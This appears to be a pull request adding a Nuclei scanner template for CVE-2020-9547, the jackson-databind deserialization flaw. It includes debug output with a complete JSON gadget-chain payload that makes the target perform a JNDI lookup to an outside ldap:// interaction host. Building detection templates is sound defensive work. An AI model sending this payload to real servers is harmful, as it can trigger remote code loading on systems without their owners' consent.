Template / PR Information

• Added CVE-2020-9547 - FasterXML jackson-databind Deserialization RCE
• References:
  • https://github.com/fairyming/CVE-2020-9547
  • https://nvd.nist.gov/vuln/detail/CVE-2020-9547
  • https://github.com/FasterXML/jackson-databind/issues/2620
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9547

Template Validation

I’ve validated this template locally?

• YES
• NO

Additional Details (leave it blank if not applicable)

Debug Data (-debug flag output):

# Command used: nuclei -u http://vulnerable-app:8080 -t CVE-2020-9547.yaml -debug

[CVE-2020-9547] Sent HTTP request to http://vulnerable-app:8080/api
POST /api HTTP/1.1
Host: vulnerable-app:8080
Content-Type: application/json
Accept: application/json
Connection: close

{
  "id": 1,
  "@class": "com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig",
  "properties": {
    "@class": "java.util.HashMap",
    "userTransactionName": {
      "@class": "com.sun.rowset.JdbcRowSetImpl",
      "dataSourceName": "ldap://c9a8b2d1e3f4g5h6.interact.sh",
      "autoCommit": true
    }
  }
}

HTTP/1.1 500 Internal Server Error
Content-Type: application/json
Server: Apache-Coyote/1.1
Content-Length: 245

{
  "timestamp": "2024-01-01T12:00:00.000+00:00",
  "status": 500,
  "error": "Internal Server Error",
  "exception": "com.fasterxml.jackson.databind.exc.InvalidTypeIdException",
  "message": "Could not resolve type id 'com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig'"
}

/claim #12488

Additional References:

• Nuclei Template Creation Guideline
• Nuclei Template Matcher Guideline
• Nuclei Template Contribution Guideline
• PD-Community Discord server